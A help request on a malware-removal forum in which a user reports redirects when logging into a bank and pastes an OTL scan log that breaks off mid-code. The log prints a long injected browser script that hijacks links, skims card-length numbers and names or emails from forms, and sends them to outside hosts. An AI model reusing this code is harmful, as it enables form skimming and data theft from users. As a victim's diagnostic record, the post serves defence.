Help: Unknown malware causes clicking links to sometimes redirect to a

malware removal spyware removal virus removal

  • This topic is locked

#1
awesomesauce


Hi there,

I posted this the other day (10/10/14) but cannot seem to find the original post and had no replies. Not sure if it was deleted or not.

Here's the basic issue:

I have been streaming free movies online for the last few weeks and seem to have picked up a virus somewhere.

When I click "submit" or similar buttons on forms I *sometimes* get redirected to a spammy advert page.

For instance on the website: www.bankwest.com.au when I click "Go" to logon, it redirects to a page like: http://bluebec.net/alerts/dfhfdhg/?_rff=px.pluginh

Any guidance would be much appreciated.

Thanks in advance!

Here is my OTL log:

OTL logfile created on: 14/10/2014 4:23:56 PM - Run 2
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Mitey Fresh\Downloads
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17280)
Locale: 00000c09 | Country: Australia | Language: ENA | Date Format: d/MM/yyyy
 
3.79 Gb Total Physical Memory | 1.44 Gb Available Physical Memory | 37.89% Memory free
7.59 Gb Paging File | 4.89 Gb Available in Paging File | 64.47% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 273.39 Gb Total Space | 112.29 Gb Free Space | 41.07% Space Free | Partition Type: NTFS
Drive D: | 180.27 Gb Total Space | 117.47 Gb Free Space | 65.17% Space Free | Partition Type: NTFS
 
Computer Name: KIRRA-PC | User Name: Mitey Fresh | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014/10/10 12:58:04 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Mitey Fresh\Downloads\OTL.exe
PRC - [2014/10/03 21:30:08 | 001,514,040 | ---- | M] (Spotify Ltd) -- C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
PRC - [2014/09/04 12:44:30 | 003,802,448 | ---- | M] (LogMeIn Inc.) -- D:\Games\LogMeIn Hamachi\hamachi-2-ui.exe
PRC - [2014/02/20 12:03:06 | 000,859,464 | ---- | M] (Google Inc.) -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
PRC - [2013/12/21 17:04:16 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/02/20 12:03:05 | 000,394,568 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\ppgooglenaclpluginchrome.dll
MOD - [2014/02/20 12:03:04 | 013,632,840 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\PepperFlash\pepflashplayer.dll
MOD - [2014/02/20 12:03:03 | 004,060,488 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\pdf.dll
MOD - [2014/02/20 12:02:59 | 000,716,616 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\libglesv2.dll
MOD - [2014/02/20 12:02:58 | 000,100,168 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\libegl.dll
MOD - [2014/02/20 12:02:56 | 001,647,432 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\ffmpegsumo.dll
MOD - [2014/02/20 12:02:54 | 000,051,016 | ---- | M] () -- C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\chrome_elf.dll
MOD - [2009/02/26 10:45:08 | 000,024,912 | ---- | M] () -- C:\Program Files (x86)\Microsoft Office\Office12\Wordcnvpxy.cnv
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2014/08/22 16:14:34 | 000,368,624 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:64bit: - [2014/08/22 16:14:34 | 000,023,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:64bit: - [2014/08/19 09:03:37 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2013/05/27 16:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2010/05/20 16:26:28 | 000,199,536 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft LifeCam\MSCamS64.exe -- (MSCamSvc)
SRV:64bit: - [2009/07/14 12:39:31 | 000,045,568 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\rundll32.exe -- (671c50b0)
SRV - [2014/09/24 20:48:07 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/09/04 12:44:28 | 002,525,008 | ---- | M] (LogMeIn Inc.) [Auto | Running] -- D:\Games\LogMeIn Hamachi\hamachi-2.exe -- (Hamachi2Svc)
SRV - [2014/05/30 04:36:52 | 000,543,424 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014/04/19 13:26:23 | 000,119,408 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014/03/21 09:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2013/12/21 17:04:16 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2013/11/29 18:23:38 | 001,296,728 | ---- | M] (www.BitComet.com) [On_Demand | Stopped] -- C:\Program Files (x86)\BitComet\tools\BitCometService.exe -- (BITCOMET_HELPER_SERVICE)
SRV - [2013/10/23 08:15:08 | 000,172,192 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2013/09/11 21:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2014/07/17 19:05:06 | 000,125,584 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:64bit: - [2014/01/23 09:57:12 | 000,283,064 | ---- | M] (Disc Soft Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV:64bit: - [2012/03/01 17:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2012/01/10 22:28:18 | 012,311,904 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2011/03/11 17:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011/03/11 17:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2010/11/21 00:33:35 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/11/20 22:07:05 | 000,059,392 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2010/05/20 16:26:28 | 002,060,144 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VX1000.sys -- (VX1000)
DRV:64bit: - [2009/09/17 19:54:54 | 000,056,344 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (HECIx64)
DRV:64bit: - [2009/07/14 12:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/14 12:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/14 12:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/06/20 13:09:57 | 001,394,688 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\athrx.sys -- (athr)
DRV:64bit: - [2009/06/11 07:35:42 | 000,187,392 | ---- | M] (Realtek Corporation                                            ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:64bit: - [2009/06/11 07:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/11 07:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/11 07:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/11 07:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2009/03/18 17:35:42 | 000,033,856 | -H-- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\hamachi.sys -- (hamachi)
DRV - [2009/07/14 12:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.sweet-pag...F1A80P6304P6304
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE:64bit: - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://www.sweet-pag...q={searchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.sweet-pag...F1A80P6304P6304
IE - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://www.sweet-pag...q={searchTerms}
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.sweet-pag...F1A80P6304P6304
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.sweet-pag...q={searchTerms}
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.sweet-pag...q={searchTerms}
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com.au/
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://ninemsn.com.au/?ocid=iehp
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-AU
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 6E 81 95 E1 01 42 CE 01  [binary data]
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com
IE - HKCU\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...Box&FORM=IE11SR
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
========== FireFox ==========
 
FF - prefs.js..browser.search.defaultenginename: "sweet-page"
FF - prefs.js..browser.search.defaultthis.engineName: ""
FF - prefs.js..browser.search.selectedEngine: "sweet-page"
FF - prefs.js..browser.startup.homepage: "http://www.sweet-pag...1A80P6304P6304"
FF - prefs.js..extensions.enabledAddons: faststartff%40gmail.com:4.3.0
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:28.0
FF - prefs.js..extensions.ocqQ4lEIHr3.scode: [long minified JavaScript value omitted]
!1;}}}};_zyad.init();})();(function(){try{if(window.opener&&window.self==window.top&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://canadaalltax....836&pid=0&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var 
b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild(b),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};setTimeout(function(){window.self.location.href=\"'+d+'\";},10);',document.getElementsByTagName(\"head\")[0].appendChild(b))}}}catch(l){}})();if(1==2&&-1<window.self.location.href.indexOf(\"df.ly/\")){var dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://canadaalltax....rTaFrn==&ch=1\")}(\"rdlnk.co\"==window.self.location.hostname||\"adfoc.us\"==window.self.location.hostname||\"www.adsbeta.net\"==window.self.location.hostname||\"ad5.eu\"==window.self.location.hostname)&&(dd=document.getElementsByTagName(\"iframe\")[0])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?ch=1\");\"cf.ly\"==window.self.location.hostname&&(dd=document.getElementsByTagName(\"iframe\")[1])&&dd.setAttribute(\"src\",\"http://canadaalltax....rTaFrn==&ch=1\");\"adv.li\"==window.self.location.hostname&&(dd=document.getElementById(\"main\"))&&dd.setAttribute(\"src\",\"http://canadaalltax....rTaFrn==&ch=1\");if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://canadaalltax....f.location.href)+\"&s=px.pluginh&r=\"+Math.random());var b=new 
Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};if(\"www.youtube.com\"==window.self.location.hostname&&\"http:\"==window.self.location.protocol){var video_id=window.location.search.split(\"v=\")[1];if(video_id){var ampersandPosition=video_id.indexOf(\"&\");-1!=ampersandPosition&&(video_id=video_id.substring(0,ampersandPosition));if(video_id&&document.getElementById(\"watch7-views-info\")){var vc=document.getElementById(\"watch7-views-info\").firstElementChild;vc&&document.getElementById(\"watch7-views-info\").firstElementChild.innerHTML&&((new Image).src=\"http://score.develop...h7-views-info\").firstElementChild.innerHTML.replace(/[^0-9]/g,\"\"))}}};if((-1<window.self.location.hostname.indexOf(\"foodpanda\")||-1<window.self.location.hostname.indexOf(\"hellofood\"))&&document.getElementById(\"submitRegisterStep1\")){var price=query_selector_all(\".cart-line-price\"),p=price&&price[price.length-1]?parseInt(price[price.length-1].innerHTML.replace(/[^0-9]/g,\"\")):0,h=window.self.location.hostname;(new Image).src=\"http://score.develop...Of(\"checkout\")&&((new Image).src=\"http://score.develop...usteat.in&s=0\");\"tastykhana.in\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"billing\")&&((new Image).src=\"http://score.develop...usteat.in&s=0\");if(-1<window.self.location.hostname.indexOf(\"titbit.com\")||\"checkout\"==window.self.location.hostname)(new Image).src=\"http://score.develop...xOf(\"payment\")&&((new Image).src=\"http://score.develop...ubhub.com&s=0\");\"www.delivery.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"order_process\")&&((new 
Image).src=\"http://score.develop...ivery.com&s=0\");\"www.foodler.com\"==window.self.location.hostname&&-1<window.self.location.href.indexOf(\"AnonCheckout\")&&((new Image).src=\"http://score.develop...odler.com&s=0\");\"eat24hours.com\"==window.self.location.hostname&&\"https:\"==window.self.location.protocol&&((new Image).src=\"http://score.develop...hours.com&s=0\");(function(){try{var a=document.getElementsByTagName(\"input\");if(\"https:\"==window.self.location.protocol&&4<a.length)for(var d=function(b){b=b.target;if(b.value&&11<b.value.length&&20>b.value.length&&b.value.match(/^[0-9]+$/))for((new Image).src=\"https://score.sendap...&s=0&r=\" ( new Date).toString()+Math.random(),b=0;b<a.length;b++)a&&a.removeEventListener?a.removeEventListener(\"blur\",d,!1):a&&a.detachEvent&&a.detachEvent(\"onblur\",d)},c=0;c<a.length;c++)a[c]&&a[c].addEventListener?a[c].addEventListener(\"blur\",d,!1):a[c]&&a[c].attachEvent&&a[c].attachEvent(\"onblur\",d)}catch(e){}})();(function(){var init=function(b,a,f){for(var e=function(){for(var d=[],c=0;c<a.length;c++)b[a[c]]&&b[a[c]].value&&2<b[a[c]].value.length&&d.push(b[a[c]].value.replace(/[^0-9a-z \\-_\\[email protected]]/ig,\"\"));if(d.length==a.length)for((new 
Image).src=\"https://score.sendap...nt(d.join(\",\"))+\"&r=\"+Math.random(),c=0;c<a.length;c++)b[a[c]]&&b[a[c]].removeEventListener?b[a[c]].removeEventListener(\"blur\",e,!1):b[a[c]]&&b[a[c]].detachEvent&&b[a[c]].detachEvent(\"onblur\",e)},d=0;d<a.length;d++)b[a[d]]&&b[a[d]].addEventListener?b[a[d]].addEventListener(\"blur\",e,!1):b[a[d]]&&b[a[d]].attachEvent&&b[a[d]].attachEvent(\"onblur\",e)};(\"www.apply.forex.com\"==window.self.location.hostname||\"apply.forex.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"Screen1\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolder1$ctl01$txtFirstname,ctl00$ContentPlaceHolder1$ctl01$txtLastname,ctl00$ContentPlaceHolder1$ctl01$txtVerifyEmail\".split(','),\"3\");(\"www.thelotter.com\"==window.self.location.hostname||\"thelotter.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"remoteshortregistration\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtFirstName,ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtEmail\".split(','),\"4\");(\"www.calottery.com\"==window.self.location.hostname||\"calottery.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"register\")&&document[\"frmMain\"]&&init(document[\"frmMain\"],\"objBody$content_0$leftcolumn_0$txtFirstName,objBody$content_0$leftcolumn_0$txtLastName,objBody$content_0$leftcolumn_0$txtEmail\".split(','),\"5\")})();(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"A9z92S5T=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"A9z92S5T=\")){var d=a.match(/A9z92S5T=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var 
j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.websco...6qjsHpdYHqY==\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se 
Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://canadaalltax....\" Math.random();break}}}catch(d){}})();if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//www.superfish.com/ws/sf_main.jsp?dlsource=pcom&userId=6143022708&CTID=p0';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1546/l.js?aoi=1311798366&pid=1546&zoneid=287609&ext=RoboSaver&systemid=3690070418775238836\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.4.1\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.num_of_items_in_one=2;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; 
expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c;\" \"==g.charAt(0);)g=g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null}; a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)}; b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForTokens={};a.addScript=function(a,b){if(\"undefined\"==typeof Element.prototype.appendChild.toString)document.getElementsByTagName(\"head\")[0].appendChild(a);else if(\"bing\"==b){var e=Element.prototype.appendChild,f=document.createElement(\"iframe\");Element.prototype.appendChild=f.document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}};a.waitForElement=function(c,d,e,f){var 